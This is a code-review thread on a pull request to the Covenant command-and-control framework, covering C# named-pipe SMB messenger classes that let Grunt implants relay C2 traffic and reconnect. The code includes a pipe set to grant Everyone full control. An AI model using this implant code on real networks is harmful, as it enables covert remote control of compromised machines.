Covenant/Data/Grunt/GruntSMB/GruntSMB.cs

```diff
@@ -673,6 +764,68 @@ private byte[] ReadBytes()
         }
     }
 
+    public class ClientSMBMessenger : SMBMessengerBase
+    {
+        private int Timeout { get; set; } = 5000;
+
+        public ClientSMBMessenger(string Hostname, string PipeName, int Timeout = 5000) : base(Hostname, PipeName, false)
+        {
+            this.Timeout = Timeout;
+        }
+
+        public void Connect()
+        {
+            this.ReCreatePipeState();
+
+        }
+
+        protected override void ReCreatePipeState()
+        {
+            // If named pipe became disconnected (!this.IsConnected), then try to re-connect to the SMB server, else continue.
+            if (!this.IsConnected)
+            {
+                NamedPipeClientStream ClientPipe = new NamedPipeClientStream(Hostname, PipeName, PipeDirection.InOut, PipeOptions.Asynchronous);
+                ClientPipe.Connect(Timeout);
+                ClientPipe.ReadMode = PipeTransmissionMode.Byte;
+                this.Pipe = ClientPipe;
+                this.IsConnected = true;
+                // Start the pipe status monitoring thread
+                this.MonitorPipeState();
+            }
+        }
+    }
+
+    public class ServerSMBMessenger : SMBMessengerBase
+    {
+        private PipeSecurity Security = new PipeSecurity();
+        public TaskingMessenger Messenger { get; set; } = null;
+        public ServerSMBMessenger(NamedPipeServerStream ServerPipe, string Pipename) : base(ServerPipe, string.Empty, Pipename, true)
+        {
+            Security.AddAccessRule(new PipeAccessRule(new SecurityIdentifier(WellKnownSidType.WorldSid, null), PipeAccessRights.FullControl, AccessControlType.Allow));
+        }
+
+        public void Start()
+        {
+            this.ReCreatePipeState();
+        }
+
+        protected override void ReCreatePipeState()
+        {
+            // If named pipe became disconnected (!this.IsConnected), then wait for a new incoming connection, else continue.
+            if (!this.IsConnected)
+            {
+                NamedPipeServerStream newServerPipe = new NamedPipeServerStream(this.PipeName, PipeDirection.InOut, NamedPipeServerStream.MaxAllowedServerInstances, PipeTransmissionMode.Byte, PipeOptions.Asynchronous, 1024, 1024, Security);
+                newServerPipe.WaitForConnection();
+                this.Pipe = newServerPipe;
+                this.IsConnected = true;
+                this.MonitorPipeState();
+                // Tell the parent Grunt the GUID so that it knows to which child grunt which messages shall be forwarded. Without this message, any further communication breaks.
+                this.Messenger.QueueTaskingMessage(string.Empty);
+                this.Messenger.WriteTaskingMessage();
```

Comment:
Hey @chopicalqui , could you elaborate a bit on what this is for? It's not clear to me why this is necessary?

Reply:
Hey @cobbr 
These two lines are required to successfully reconnect to already **fully staged** SMB Grunts.  They send an empty message to the Egress Grunt, which is then able to extract the SMB Grunt's ID from it and associate the newly established named pipe with the SMB Grunt's ID (see corresponding code of `TaskingMessenger.Connect` below).

```
[...]
ProfileMessage read = downstream.Read();
if (read != null && !string.IsNullOrEmpty(read.Message))
{
    if (string.IsNullOrEmpty(downstream.Identifier))
    {
        GruntEncryptedMessage message = this.Profile.ParseWriteFormat(read.Message);
        if (message.GUID.Length == 20)
        {
            downstream.Identifier = message.GUID.Substring(10);
        }
        else if (message.GUID.Length == 10)
        {
            downstream.Identifier = message.GUID;
        }
    }
    this.UpstreamMessenger.Write(read.Message);
}
[...]
```

Without these two lines, no association between the named pipe and SMB Grunt ID exists, and as a result,
the Egress Grunt does not know where incoming messages from the C2 server should be forwarded (see forwarding code of `TaskingMessenger.ReadTaskingMessage` below) and any further communication breaks.

```
[...]
string json = this.Crafter.Retrieve(gruntMessage);
GruntEncryptedMessage wrappedMessage = GruntEncryptedMessage.FromJson(json);
IMessenger relay = this.DownstreamMessengers.FirstOrDefault(DM => DM.Identifier == wrappedMessage.GUID);
if (relay != null)
{
    relay.Write(this.Profile.FormatReadFormat(wrappedMessage));
}
[...]
```

**Drawback**
Unfortunately, this message is only required by the Egress Grunt. As the Egress Grunt cannot inspect the SMB Grunt's encrypted message, it does not know that it is an empty message and forwards it to the C2 server, which creates unnecessary egress communication.

**Alternative Solution**
The C2 server itself could add the SMB Grunt ID to the `Connect` task. In this case, the Egress Grunt would be able to obtain the SMB Grunt ID directly during the connect. In this case, these two lines wouldn't be required anymore.